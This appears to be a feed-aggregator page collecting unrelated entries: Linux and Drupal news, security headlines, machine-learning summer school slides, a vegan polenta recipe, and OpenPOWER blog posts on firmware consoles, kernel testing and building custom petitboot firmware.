This new version features installation in LXC/LXD containers, theme customization, more stability with automagic dependencies support, better security as editing the kernel params now requires a password and system update can be only performed by users authorized to do so. You will find the details below.

Calculate Linux Desktop featuring KDE (CLD), Cinnamon (CLDC), Mate (CLDM), or Xfce (CLDX) environments, Calculate Linux Scratch (CLS), Calculate Directory Server (CDS), Calculate Scratch Server (CSS), Timeless and Calculate Linux Container (CLC) are available for download.

Read more


          Ondersteboven ingebouwd scherm mogelijke oorzaak raar scrolleffect OnePlus 5   
Het scherm in de OnePlus 5 is ondersteboven in het toestel gemonteerd. Dat blijkt uit een teardown van de hardware en een inspectie van de kernel. Een direct verband tussen dit en het rare effect dat voor kan komen bij het scrollen is er niet, maar de twee lijken wel met elkaar te maken te hebben.
          Drupal core: Aug. 14: Remove assertIdentical methods in favour of assertSame in core/tests/Drupal/KernelTests   

There are lots of calls to deprecated assertIdentical() in kerneltests. Replacing them is a simple matter using sed.

This issue is only about replacing the calls in kerneltests, since replacing the calls in other tests outside kerneltests is a bit more complicated to get right.


          Module Filter: undefined index line 160 of module_filter.module   

hundreds of the following error message are flooding into the Drupal 8 dblog ...

PROBLEM:
Undefined index: in module_filter_system_modules_recent_enabled_submit() (line 160 of module_filter.module)

Notice: Undefined index: xmlsitemap_engines in module_filter_system_modules_recent_enabled_submit() (line 160 of /{website-path}/modules/contrib/module_filter/module_filter.module) #0 /{website-path}/core/includes/bootstrap.inc(566): _drupal_error_handler_real(8, 'Undefined index...', '/home/iisiaqdm/...', 160, Array) #1 /{website-path}/modules/contrib/module_filter/module_filter.module(160): _drupal_error_handler(8, 'Undefined index...', '/home/iisiaqdm/...', 160, Array) #2 [internal function]: module_filter_system_modules_recent_enabled_submit(Array, Object(Drupal\Core\Form\FormState)) #3 /{website-path}/core/lib/Drupal/Core/Form/FormSubmitter.php(111): call_user_func_array('module_filter_s...', Array) #4 /{website-path}/core/lib/Drupal/Core/Form/FormSubmitter.php(51): Drupal\Core\Form\FormSubmitter->executeSubmitHandlers(Array, Object(Drupal\Core\Form\FormState)) #5 /{website-path}/core/lib/Drupal/Core/Form/FormBuilder.php(585): Drupal\Core\Form\FormSubmitter->doSubmitForm(Array, Object(Drupal\Core\Form\FormState)) #6 /{website-path}/core/lib/Drupal/Core/Form/FormBuilder.php(314): Drupal\Core\Form\FormBuilder->processForm('system_modules', Array, Object(Drupal\Core\Form\FormState)) #7 /{website-path}/core/lib/Drupal/Core/Controller/FormController.php(74): Drupal\Core\Form\FormBuilder->buildForm(Object(Drupal\system\Form\ModulesListForm), Object(Drupal\Core\Form\FormState)) #8 [internal function]: Drupal\Core\Controller\FormController->getContentResult(Object(Symfony\Component\HttpFoundation\Request), Object(Drupal\Core\Routing\RouteMatch)) #9 /{website-path}/core/lib/Drupal/Core/EventSubscriber/EarlyRenderingControllerWrapperSubscriber.php(123): call_user_func_array(Array, Array) #10 /{website-path}/core/lib/Drupal/Core/Render/Renderer.php(574): Drupal\Core\EventSubscriber\EarlyRenderingControllerWrapperSubscriber->Drupal\Core\EventSubscriber\{closure}() #11 /{website-path}/core/lib/Drupal/Core/EventSubscriber/EarlyRenderingControllerWrapperSubscriber.php(124): Drupal\Core\Render\Renderer->executeInRenderContext(Object(Drupal\Core\Render\RenderContext), Object(Closure)) #12 /{website-path}/core/lib/Drupal/Core/EventSubscriber/EarlyRenderingControllerWrapperSubscriber.php(97): Drupal\Core\EventSubscriber\EarlyRenderingControllerWrapperSubscriber->wrapControllerExecutionInRenderContext(Array, Array) #13 [internal function]: Drupal\Core\EventSubscriber\EarlyRenderingControllerWrapperSubscriber->Drupal\Core\EventSubscriber\{closure}() #14 /{website-path}/vendor/symfony/http-kernel/HttpKernel.php(144): call_user_func_array(Object(Closure), Array) #15 /{website-path}/vendor/symfony/http-kernel/HttpKernel.php(64): Symfony\Component\HttpKernel\HttpKernel->handleRaw(Object(Symfony\Component\HttpFoundation\Request), 1) #16 /{website-path}/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\Component\HttpKernel\HttpKernel->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #17 /{website-path}/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\Core\StackMiddleware\Session->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #18 /{website-path}/core/modules/page_cache/src/StackMiddleware/PageCache.php(99): Drupal\Core\StackMiddleware\KernelPreHandle->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #19 /{website-path}/core/modules/page_cache/src/StackMiddleware/PageCache.php(78): Drupal\page_cache\StackMiddleware\PageCache->pass(Object(Symfony\Component\HttpFoundation\Request), 1, true) #20 /{website-path}/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\page_cache\StackMiddleware\PageCache->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #21 /{website-path}/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(50): Drupal\Core\StackMiddleware\ReverseProxyMiddleware->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #22 /{website-path}/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\Core\StackMiddleware\NegotiationMiddleware->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #23 /{website-path}/core/lib/Drupal/Core/DrupalKernel.php(656): Stack\StackedHttpKernel->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #24 /{website-path}/index.php(19): Drupal\Core\DrupalKernel->handle(Object(Symfony\Component\HttpFoundation\Request)) #25 {main}.


          BTTB: looping for shell script under embedded linux   
You may already realized Linux happened to appear at many places, such as web server, storage server, desktop, kiosk machine, mobile devices. Yes, more and more devices running embedded Linux. Yeah, Android is a modified version of Linux kernel too! Scarcity is still an issue, embedded Linux can be very different to Linux that hosted […]
          Install Gentoo for kernel hacking   
I am curious about what are Linux kernel do? Many years ago, due to the tedious steps to compile the kernel, I give up dive into it at the very beginning stage, which is compiling kernel. But recently this urge come back to me. I started to wonder whether is it exist a Linux distro […]
          Kina ser Hongkong som ukrænkeligt kerneland trods aftale   
Den kommunistiske, kinesiske præsident, Xi Jinpings, besøg i Hongkong på 20-året for bystatens indlemmelse i Kina handler om at vise, at Kina bestemmer. Mens Hongkong officielt har en s ...
          Slides: Machine Learning Summer School @ Max Planck Institute for Intelligent Systems, Tübingen, Germany   


Here are the slides of some of the presentations at the Machine Learning Summer School at the Max Planck Institute for Intelligent Systems, Tübingen, Germany

Shai Ben-David
(Waterloo)
 Learning Theory.
Slides part 1 part 2 part 3
Dominik Janzing
(MPI for Intelligent Systems)
 Causality.
Slides here.
Stefanie Jegelka
(MIT)
 Submodularity.
Slides here.


Jure Lescovec
(Stanford)
Network Analysis.
Slides 1 2 3 4




Ruslan Salakhutdinov
(CMU)
Deep Learning.
Slides part 1 part 2


Suvrit Sra
(MIT)
Optimization.
Slides 1 2 3A 3B
Bharath Sriperumbudur
(PennState)
Kernel Methods.
Slides part 1 part 2 part 3


Max Welling
(Amsterdam)
Large Scale Bayesian Inference with an Application to Bayesian Deep Learning
Slides here.




Bernhard Schölkopf
(MPI for Intelligent Systems)
Introduction to ML and speak on Causality.
Slides here.

h/t Russ




Join the CompressiveSensing subreddit or the Google+ Community or the Facebook page and post there !
Liked this entry ? subscribe to Nuit Blanche's feed, there's more where that came from. You can also subscribe to Nuit Blanche by Email, explore the Big Picture in Compressive Sensing or the Matrix Factorization Jungle and join the conversations on compressive sensing, advanced matrix factorization and calibration issues on Linkedin.

          Security: Systemd, ELSA, and OutlawCountry   

          Canonical Outs Important Kernel Update for All Supported Ubuntu Linux Releases   

After patching a recently discovered systemd vulnerability in Ubuntu 17.04 and Ubuntu 16.10, Canonical today released a new major kernel update for all of its supported Ubuntu Linux operating systems, including Ubuntu 17.04, Ubuntu 16.10, Ubuntu 16.04 LTS, Ubuntu 14.04 LTS, and Ubuntu 12.04 LTS (HWE), patching up to fifteen security flaws.

Read more


          Security: OutlawCountry, WatchGuard FUD, SambaCry FUD, Overhyped Systemd Bug   
  • OutlawCountry

    Today, June 29th 2017, WikiLeaks publishes documents from the OutlawCountry project of the CIA that targets computers running the Linux operating system. OutlawCountry allows for the redirection of all outbound network traffic on the target computer to CIA controlled machines for ex- and infiltration purposes. The malware consists of a kernel module that creates a hidden netfilter table on a Linux target; with knowledge of the table name, an operator can create rules that take precedence over existing netfilter/iptables rules and are concealed from an user or even system administrator.

    The installation and persistence method of the malware is not described in detail in the document; an operator will have to rely on the available CIA exploits and backdoors to inject the kernel module into a target operating system. OutlawCountry v1.0 contains one kernel module for 64-bit CentOS/RHEL 6.x; this module will only work with default kernels. Also, OutlawCountry v1.0 only supports adding covert DNAT rules to the PREROUTING chain.

  • WatchGuard survey indicates Linux, Web servers becoming hot targets for cyber attacks [Ed: Watchguard is a Microsoft buddy from Seattle. Its own site says it "recently became an official member of the Microsoft Partner Network”. Watch out for press releases and 'journalists' who copy-paste their PR (we saw several). Anti-Linux FUD.]
  • The SambaCry scare gives Linux users a taste of WannaCry-Petya problems [Ed: only for those who mimic/simulate Windows]
  • ​Linux's systemd vulnerable to DNS server attack
  • Systemd Bug Lets Attackers Hack Linux Boxes via Malicious DNS Packets

          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Peppered Mexican Polenta Towers   
I had this dish in my head for about a week. It came once again, from gluten-free cooking, and I really like polenta anyway! My favorite way to eat it is crispy fried on the outside. I thought it would be delicious Mexican style over beans, so here we are! I also got to take advantage of the Farmer's Market and I got heirloom tomatoes and bell peppers at a *very* reasonable price, which I am psyched about! Called "Peppered" because I have mild bell peppers, fried jalapenos, and chipotle (smoked jalapeno) powder.

If you are going to make this, then do the polenta and marinate the tofu the day before. You may even do the salsa w/o the avocado and add it last minute. Don't be intimidated by the length of the recipe, it's just several simple components, and you can do it if I can! Keep polenta and tofu warm in the oven if you need to, while preparing the plates.




Peppered Mexican Polenta Stacks (Makes 4 servings with leftover polenta)

Tofu:
1 lb tofu, cut into 8 slabs and pressed
Tofu Marinade- Wheat Free Soy sauce, brown sugar, sherry(or tequila/alcohol/lime juice), cumin, smoked paprika, chipotle powder, onion powder, water, vegetable oil. Adjust to taste. Water should be used only if marinade needs to be mellowed. Marinate an hour minimum (I like overnight). When ready to prepare, just saute in peanut or vegetable oil. Keep it simple.

Polenta-
3 1/2 c water
1 c polenta corn grits (not instant grits, y'all!)
2 tsp vegan "chicken" broth bouillon*
1 scallion, minced
1/4 c loosely-packed cilantro leaves (measure out then mince)
1 Tbsp olive oil/margarine
salt to taste (I used about 1-2 tsp)

Heat water in a medium saucepan. Whisk in bouillon while heating and heat to boiling. *You can also use premade veggie broth or any other combo bouillon/water. I make mine weak for things like this. Whisk in polenta in a steady stream. Stir often. Add water if polenta becomes really thick. I did about 1/3 cup. Cover and turn heat down, cooking 15 min. Stir often. Add scallions/cilantro and olive oil/margarine and turn heat off. Stir once or twice while polenta cools for 10 minutes in pan. Pour into container and let come to room temperature, then refrigerate until completely firm all the way through. I would say 1 hour minimum in a shallow pan. From here you can cut into desired shape and fry until crispy on each side.

Note: You can use the tubes of polenta that you find in the produce section. However, making it at home is way less expensive and the 20 min you put in can really impress because you added the cilantro and scallion flavor/color.

Beans-
I usually take refried beans (I have red refried beans, Frijoles Rojos Volteados, Natura's brand) and add stock, but I added a little extra this time. I fried up some red onions and garlic, then blended them with the stock so it would be completely smooth. General ratio is 1 c broth to 1-16oz can beans. I also add a hunk of margarine for flavor/fat since we are using lard-free. Add salt if necessary. These simmer on low for about an hour. Be careful and go slow, the mixture will blend eventually.

Tomatoes-
Thick slices of heirloom sprinkled with salt and pepper. (I was going to broil these but they are fantastic by themselves.)

Peppers-
Roast 2 red and 2 green bell peppers. Put in a paper bag or plastic container with a lid and let cool. Skin and deseed. DO NOT rinse. Cut into strips to make sure each plate gets some of each pepper.

Jalapenos-
To keep gluten free, use a GF flour like rice flour. Just chop fresh jalapeno to desired shape (I like strips because it doesn't include seeds), roll in flour, then soy buttermilk (soymilk plus a small amount apple cider vinegar), back in the rice flour and fry. These are for garnishing the top. This is optional but it's fun and pretty and quick. It also adds a punch if your peppers are hot!

Sweet Avocado Salsa-
1 ripe avocado
1 ripe mango
cilantro
small amount minced red onion (couple Tbsp)
fresh lime juice
handful fresh cut corn kernels

Do your thang! Chop those avocados and the mango, mix all ingredients except avocado. I pulsed in food processor. Fold in avocado so it keeps its structure. Corn is optional, but I like the mixture, and raw corn is really sweet and it ties into the corn in the polenta.

Plate as desired! I did it like this:

Beans on bottoms, polenta, tofu, tomato, roasted red peppers, polenta, tofu, roasted red peppers, fried jalapenos.

My presentation was a little sloppy because we had 5 hungry tummies and I didn't want it to get cold!
          Data Center/Server Engineer - Intel - San Jose, CA   
The engineer will be responsible for handling all aspects of OS, Data Center software, Kernel, and middleware....
From Intel - Sat, 17 Jun 2017 10:23:09 GMT - View all San Jose, CA jobs
          OpenPOWER console implementations   

I often have folks asking how the text & video consoles work on OpenPOWER machines. Here's a bit of a rundown on how it's implemented, and what may seem a little different from x86 platforms that you may already be used to.

On POWER machines, we get the console up and working super early in the boot process. This means that we can get debug, error and state information out using text console with very little hardware initialisation, and in a human-readable format. So, we tend to use simpler devices for the console output - typically a serial UART - rather than graphical-type consoles, which require a GPU to be up and running. This keeps the initialisation code clean and simple.

However, we still want a facility for admins who are more used to a keyboard & monitor directly plugged-in to have a console facility too. More about that later though.

The majority of OpenPOWER platforms will rely on the attached management controller (BMC) to provide the UART console (as of November 2016: unless you've designed your own OpenPOWER hardware, this will be the case for you). This will be based on ASpeed's AST2400 or AST25xx system-on-chip devices, which provide a few methods of getting console data from the host to the BMC.

Between the host and the BMC, there's a LPC bus. The host is the master of the LPC bus, and the BMC the slave. One of the facilities that the BMC exposes over this bus is a set of UART devices. Each of these UARTs appear as a standard 16550A register set, so having the host interface to a UART is very simple.

As the host is booting, the host firmware will initialise the UART console, and start outputting boot progress data. First, you'll see the ISTEP messages from hostboot, then skiboot's "msglog" output, then the kernel output from the petitboot bootloader.

Because the UART is implemented by the BMC (rather than a real hardware UART), we have a bit of flexibility about what happens to the console data. On a typical machine, there are four ways of getting access to the console:

  • Direct physical connection: using the DB-9 RS232 port on the back of the machine;
  • Over network: using the BMC's serial-over-LAN interface, using something like ipmitool [...] sol activate;
  • Local keyboard/video/mouse: connected to the VGA & USB ports on the back of the machine, or
  • Remote keyboard/video/mouse: using "remote display" functionality provided by the BMC, over the network.

The first option is fairly simple: the RS232 port on the machine is actually controlled by the BMC, and not the host. Typically, the BMC firmware will just transfer data between this port and the LPC UART (which the host is interacting with). Figure 1 shows the path of the console data.

Figure 1: Local UART console.

The second is similar, but instead of the BMC transferring data between the RS232 port and the host UART, it transfers data between a UDP serial-over-LAN session and the host UART. Figure 2 shows the redirection of the console data from the host over LAN.

Figure 2: Remote UART console.

The third and fourth options are a little more complex, but basically involve the BMC rendering the UART data into a graphical format, and displaying that on the VGA port, or sending over the network. However, there are some tricky details involved...

UART-to-VGA mirroring

Earlier, I mentioned that we start the console super-early. This happens way before any VGA devices can be initialised (in fact, we don't have PCI running; we don't even have memory running!). This means that it's not possible to get these super-early console messages out through the VGA device.

In order to be useful in deployments that use VGA-based management though, most OpenPOWER machines have functionality to mirror the super-early UART data out to the VGA port. During this process, it's the BMC that drives the VGA output, and renders the incoming UART text data to the VGA device. Figure 3 shows the flow for this, with the GPU rendering text console to the graphical output.

Figure 3: Local graphical console during early boot.

In the case of remote access to the VGA device, the BMC takes the contents of this rendered graphic and sends it over the network, to a BMC-provided web application. Figure 4 illustrates the redirection to the network.

Figure 4: Remote graphical console during early boot, with graphics sent over the network

This means we have console output, but no console input. That's okay though, as this is purely to report early boot messages, rather than provide any interaction from the user.

Once the host has booted to the point where it can initialise the VGA device itself, it takes ownership of the VGA device (and the BMC relinquishes it). The first software on the host to start interacting with the video device is the Linux driver in petitboot. From there on, video output is coming from the host, rather than the BMC. Because we may have user interaction now, we use the standard host-controlled USB stack for keyboard & mouse control.

Figure 5: Local graphical console later in boot, once the host video driver has started.

Remote VGA console follows the same pattern - the BMC captures the video data that has been rendered by the GPU, and sends it over the network. In this case, the console input is implemented by virtual USB devices on the BMC, which appear as a USB keyboard and mouse to the operating system running on the host.

Figure 6: Remote graphical console later in boot, once the host video driver has started.

Typical console output during boot

Here's a few significant points of the boot process:

  3.60212|ISTEP  6. 3
  4.04696|ISTEP  6. 4
  4.04771|ISTEP  6. 5
 10.53612|HWAS|PRESENT> DIMM[03]=00000000AAAAAAAA
 10.53612|HWAS|PRESENT> Membuf[04]=0C0C000000000000
 10.53613|HWAS|PRESENT> Proc[05]=C000000000000000
 10.62308|ISTEP  6. 6

- this is the initial output from hostboot, doing early hardware initialisation in discrete "ISTEP"s

 41.62703|ISTEP 21. 1
 55.22139|htmgt|OCCs are now running in ACTIVE state
 63.34569|ISTEP 21. 2
 63.33911|ISTEP 21. 3
[   63.417465577,5] SkiBoot skiboot-5.4.0 starting...
[   63.417477129,5] initial console log level: memory 7, driver 5
[   63.417480062,6] CPU: P8 generation processor(max 8 threads/core)
[   63.417482630,7] CPU: Boot CPU PIR is 0x0430 PVR is 0x004d0200
[   63.417485544,7] CPU: Initial max PIR set to 0x1fff
[   63.417946027,5] OPAL table: 0x300c0940 .. 0x300c0e10, branch table: 0x30002000
[   63.417951995,5] FDT: Parsing fdt @0xff00000

- here, hostboot has loaded the next firmware stage, skiboot, and we're now executing that.

[   22.120063542,5] INIT: Waiting for kernel...
[   22.154090827,5] INIT: Kernel loaded, size: 15296856 bytes (0 = unknown preload)
[   22.197485684,5] INIT: 64-bit LE kernel discovered
[   22.218211630,5] INIT: 64-bit kernel entry at 0x20010000, size 0xe96958
[   22.247596543,5] OCC: All Chip Rdy after 0 ms
[   22.296864319,5] Free space in HEAP memory regions:
[   22.304756431,5] Region ibm,firmware-heap free: 9b4b78
[   22.322076546,5] Region ibm,firmware-allocs-memory@2000000000 free: 10cd70
[   22.341542329,5] Region ibm,firmware-allocs-memory@0 free: afec0
[   22.392470901,5] Total free: 11999144
[   22.419746381,5] INIT: Starting kernel at 0x20010000, fdt at 0x305dbae8 (size 0x1d251)   

next, the skiboot firmware has loaded the petitboot bootloader kernel (in zImage.epapr format), and is setting up memory regions in preparation for running Linux.

zImage starting: loaded at 0x0000000020010000 (sp: 0x0000000020e94ed8)
Allocating 0x1545554 bytes for kernel ...
gunzipping (0x0000000000000000 <- 0x000000002001d000:0x0000000020e9238b)...done 0x13c0300 bytes

Linux/PowerPC load: 
Finalizing device tree... flat tree at 0x20ea1520
[   24.074353446,5] OPAL: Switch to little-endian OS
 -> smp_release_cpus()
spinning_secondaries = 159
 <- smp_release_cpus()
 <- setup_system() 

we then get the output from the zImage wrapper, which expands the actual kernel code and executes it. In recent firmware builds, the petitboot kernel will suppress most of the Linux boot messages, so we should only see high-priority warnings or error messages.

next up, the petitboot UI will be shown:

 Petitboot (v1.2.3-a976d01)                   8335-GCA         2108ECA
 ──────────────────────────────────────────────────────────────────────────────
  [Disk: sda1 / 590328e2-1095-4fe7-8278-0babaa9b9ca5]          
    Ubuntu, with Linux 4.4.0-47-generic (recovery mode)
    Ubuntu, with Linux 4.4.0-47-generic
    Ubuntu

  [Network: enP3p3s0f3 / 98:be:94:67:c0:1b]
    Ubuntu 14.04.x installer
    Ubuntu 16.04 installer
    test kernel



  System information
  System configuration
  Language
  Rescan devices
  Retrieve config from URL
 *Exit to shell                                                
 ──────────────────────────────────────────────────────────────────────────────
 Enter=accept, e=edit, n=new, x=exit, l=language, h=help

During Linux execution, skiboot will retain control of the UART (rather than exposing the LPC registers directly to the host), and provide a method for the Linux kernel to read and write to this console. That facility is provided by the OPAL_CONSOLE_READ and OPAL_CONSOLE_WRITE calls in the OPAL API.

Which one should we use?

We tend to prefer the text-based consoles for managing OpenPOWER machines - either the RS232 port on the machines for local access, or IPMI Serial over LAN (SOL) for remote access. This means that there's much less bandwidth and latency for console connections, and there is a simpler path for the console data. It's also more reliable during low-level debugging, as serial access involves fewer components of the hardware, software and firmware stacks.

That said, the VGA mirroring implementation should still work well, and is also accessible remotely by the current BMC firmware implementations. If your datacenter is not set up for local RS232 connections, you may want to use VGA for local access, and SoL for remote - or whatever works best in your situation.


          Kernel testing for OpenPOWER platforms   

Last week, Michael and I were discussing long-term Linux support for OpenPOWER platforms, particularly the concern about testing for non-IBM hardware. We'd like to ensure that the increasing range of OpenPOWER platforms, from different manufacturers, don't lose compatibility with the upstream Linux kernel.

Previously, there were only a few POWER vendors, producing a fairly limited range of hardware, so it's reasonable to get a decent amount of test coverage by booting the kernel on a small number of machines with diverse-enough components. Now, with OpenPOWER, machines are being built by different manufacturers, and so it's getting less feasible to do that coverage testing in a single lab.

To solve this, Chris, who has been running the jenkins setup on openpower.xyz, has added some kernel builds for the latest mainline kernel. We're using a .config that should be suitable for all OpenPOWER platforms. The idea here is to get as much of the OpenPOWER hardware community as possible to test the latest Linux kernel.

If you're an OpenPOWER vendor, I'd strongly suggest setting up some regular testing on this kernel. This means you'll catch any breakages before they affect users of your platform.

Setting up a test process

The jenkins build jobs expose a last-sucessful-build URL, allowing you to grab the bootable kernel image easily:

[Note that these are HTTPS links, and you should be ensuring that the certificates are correct for anything you download and boot!]

To help with testing, we've also produced a little root-filesystem image that can be booted with this kernel as an initramfs image. That's produced via a similar jenkins job.

To set up an automated test process for this kernel:

If you find a build that fails on your machine, please send us an email at linuxppc-dev@lists.ozlabs.org

Alternatively, if there's something extra you need in the kernel configuration or initramfs setup, let me know at jk@ozlabs.org.

Future work

To improve the testing coverage, we'd like to add some automated tests to the initramfs image, rather than just booting to a shell. Stay tuned for updates!


          Toolchains for OpenPower petitboot environments   

Since we're using buildroot for the OpenPower firmware build infrastructure, it's relatively straightforward to generate a standalone toolchain to build add-ons to the petitboot environment. This toolchain will allow you to cross-compile from your build host to an OpenPower host running the petitboot environment.

This is just a matter of using op-build's toolchain target, and specifying the destination directory in the BR2_HOST_DIR variable. For this example, we'll install into /opt/openpower/ :

sudo mkdir /opt/openpower/
sudo chown $USER /opt/openpower/
op-build BR2_HOST_DIR=/opt/openpower/ toolchain

After the build completes, you'll end up with a toolchain based in /opt/openpower.

Using the toolchain

If you add /opt/openpower/usr/bin/ to your PATH, you'll have the toolchain binaries available.

[jk@pecola ~]$ export PATH=/opt/openpower/usr/bin/:$PATH
[jk@pecola ~]$ powerpc64le-buildroot-linux-gnu-gcc --version
powerpc64le-buildroot-linux-gnu-gcc (Buildroot 2014.08-git-g80a2f83) 4.9.0
Copyright (C) 2014 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Currently, this toolchain isn't relocatable, so you'll need to keep it in the original directory for tools to correctly locate other toolchain components.

OpenPower doesn't (yet) specify an ABI for the petitboot environment, so there are no guarantees that a petitboot plugin will be forwards- or backwards- compatible with other petitboot environments.

Because of this, if you use this toolchain to build binaries for a petitboot plugin, you'll need to either:

  • ensure that your op-build version matches the one used for the target petitboot image; or
  • provide all necessary libraries and dependencies in your distributed plugin archive.

We're working to address this though, by defining the ABI that will be regarded as stable across petitboot builds. Stay tuned for updates.

Using the toolchain for subsequent op-build runs

Because op-build has a facility to use an external toolchain, you can re-use the toolchain build above for subsequent op-build invocations, where you want to build actual firmware binaries. If you're using multiple op-build trees, or are regularly building from scratch, this can save a lot of time as you don't need to continually rebuild the toolchain from source.

This is a matter of configuring your op-build tree to use an "External Toolchain", in the "Toolchain" screen of the menuconfig interface:

You'll need to set the toolchain path to the path you used for BR2_HOST_DIR above, with /usr appended. The other toolchain configuration parameters (kernel header series, libc type, features enabled) will need to match the parameters that were given in the initial toolchain build. However, the buildroot code will check that these match and print a helpful error message if there are any inconsistencies.

For the example toolchain built above, these are the full configuration parameters I used:

BR2_TOOLCHAIN=y
BR2_TOOLCHAIN_USES_GLIBC=y
BR2_TOOLCHAIN_EXTERNAL=y
BR2_TOOLCHAIN_EXTERNAL_CUSTOM=y
BR2_TOOLCHAIN_EXTERNAL_PREINSTALLED=y
BR2_TOOLCHAIN_EXTERNAL_PATH="/opt/openpower/usr/"
BR2_TOOLCHAIN_EXTERNAL_CUSTOM_PREFIX="$(ARCH)-linux"
BR2_TOOLCHAIN_EXTERNAL_PREFIX="$(ARCH)-linux"
BR2_TOOLCHAIN_EXTERNAL_GLIBC=y
BR2_TOOLCHAIN_EXTERNAL_HEADERS_3_15=y
BR2_TOOLCHAIN_EXTERNAL_CUSTOM_GLIBC=y
BR2_TOOLCHAIN_EXTERNAL_INET_RPC=y
BR2_TOOLCHAIN_EXTERNAL_CXX=y
BR2_TOOLCHAIN_EXTRA_EXTERNAL_LIBS=""
BR2_TOOLCHAIN_HAS_NATIVE_RPC=y
BR2_TOOLCHAIN_HAS_THREADS=y
BR2_TOOLCHAIN_HAS_THREADS_DEBUG=y
BR2_TOOLCHAIN_HAS_THREADS_NPTL=y
BR2_TOOLCHAIN_HAS_SHADOW_PASSWORDS=y
BR2_TOOLCHAIN_HAS_SSP=y

Once that's done, anything you build using that op-build configuration will refer to the external toolchain, and use that for the general build process.


          Custom kernels in OpenPower firmware   

As of commit 2aff5ba6 in the op-build tree, we're able to easily replace the kernel in an OpenPower firmware image.

This commit adds a new partition (called BOOTKERNEL) to the PNOR image, which provides the petitboot bootloader environment. Since it's now in its own partition, we can replace the image with a custom build. Here's a little guide to doing that, using an example of using a separate branch of op-build that provides a little-endian kernel.

You can check if your currently-running firmware has this BOOTKERNEL partition by running pflash -i on the BMC. It should list BOOTKERNEL in the partition table listing:

# pflash -i
Flash info:
-----------
Name          = Micron N25Qx512Ax
Total size    = 64MB 
Erase granule = 4KB 

Partitions:
-----------
ID=00            part 00000000..00001000 (actual=00001000)
ID=01            HBEL 00008000..0002c000 (actual=00024000)
[...]
ID=11            HBRT 00949000..00ca9000 (actual=00360000)
ID=12         PAYLOAD 00ca9000..00da9000 (actual=00100000)
ID=13      BOOTKERNEL 00da9000..01ca9000 (actual=00f00000)
ID=14        ATTR_TMP 01ca9000..01cb1000 (actual=00008000)
ID=15       ATTR_PERM 01cb1000..01cb9000 (actual=00008000)
[...]
#  

If your partition table does not contain a BOOTKERNEL partition, you'll need to upgrade to a more recent PNOR image to proceed.

First (if you don't have one already), grab a suitable version of op-build. In this example, we'll use my le branch, which has little-endian support:

git clone --recursive git://github.com/jk-ozlabs/op-build.git
cd op-build
git checkout -b le origin/le
git submodule update

Then, prepare our environment and configure for the relevant platform - in this case, habanero:

. op-build-env
op-build habanero_defconfig

If you'd like to change any of the kernel config (for example, to add or remove drivers), you can do that now, using the 'linux-menuconfig' target. This is only necessary if you wish to make changes. Otherwise, the default kernel config will work.

op-build linux-menuconfig

Next, we build just the userspace and kernel parts of the firmware image, by specifying the linux26-rebuild-with-initramfs build target:

op-build linux26-rebuild-with-initramfs

If you're using a fresh op-build tree, this will take a little while, as it downloads and builds a toolchain, userspace and kernel. Once that's complete, you'll have a built kernel image in the output tree:

 output/build/images/zImage.epapr

Transfer this file to the BMC, and flash using pflash. We specify the -P <PARTITION> argument to write to a single PNOR partition:

pflash -P BOOTKERNEL -e -p /tmp/zImage.epapr

And that's it! The next boot will use your newly-build kernel in the petitboot bootloader environment.

Out-of-tree kernel builds

If you'd like to replace the kernel from op-build with one from your own external source tree, you have two options. Either point op-build at your own tree, or build you own kernel using the initramfs that op-build has produced.

For the former, you can override certain op-build variables to reference a separate source. For example, to use an external git tree:

op-build LINUX_SITE=git://github.com/jk-ozlabs/linux LINUX_VERSION=v3.19

See Customising OpenPower firmware for other examples of using external sources in op-build.

The latter option involves doing a completely out-of-op-build build of a kernel, but referencing the initramfs created by op-build (which is in output/images/rootfs.cpio.xz). From your kernel source directory, add CONFIG_INITRAMFS_SOURCE argument, specifying the relevant initramfs. For example:

make O=obj ARCH=powerpc \
    CONFIG_INITRAMFS_SOURCE=../op-build/output/images/rootfs.cpio.xz

          Customising OpenPower firmware   

Now that the OpenPower sources are available, it's possible to build custom firmware images for OpenPower machines. Here's a little guide to show how that's done.

The build process

OpenPower firmware has a number of different components, and some infrastructure to pull it all together. We use buildroot to do most of the heavy lifting, plus a little wrapper, called op-build.

There's a README file, containing build instructions in the op-build git repository, but here's a quick overview:

To build an OpenPower PNOR image from scratch, we'll need a few prerequisites (assuming recent Ubuntu):

sudo apt-get install cscope ctags libz-dev libexpat-dev libc6-dev-i386 \
    gcc g++ git bison flex gcc-multilib g++-multilib libxml-simple-perl \
    libxml-sax-perl

Then we can grab the op-build repository, along with the git submodules:

git clone --recursive git://github.com/open-power/op-build.git

set up our environment and configure using the "palmetto" machine configuration:

. op-build-env
op-build palmetto_defconfig

and build:

op-build

After a while (there is quite a bit of downloading to do on the first build), the build should complete successfully, and you'll have a PNOR image build in output/images/palmetto.pnor.

If you have an existing op-build tree around (colleagues working on OpenPower perhaps?), you can share or copy the dl/ directory to save on download time.

The op-build command is just a shortcut for a make in the buildroot tree, so the general buildroot documentation applies here too. Just replace "make" with "op-build". For example, we can enable a verbose build with:

op-build V=1

Changing the build configuration

Above, we used a palmetto_defconfig as the base buildroot configuration. This defines overall options for the build; things like:

  • Toolchain details used to build the image
  • Which firmware packages are used
  • Which packages are used in the petitboot bootloader environment
  • Which kernel configuration is used for the petitboot bootloader environment

This configuration can be changed through buildroot's menuconfig UI. To adjust the configuration:

op-build menuconfig

And busybox's configuration interface will be shown:

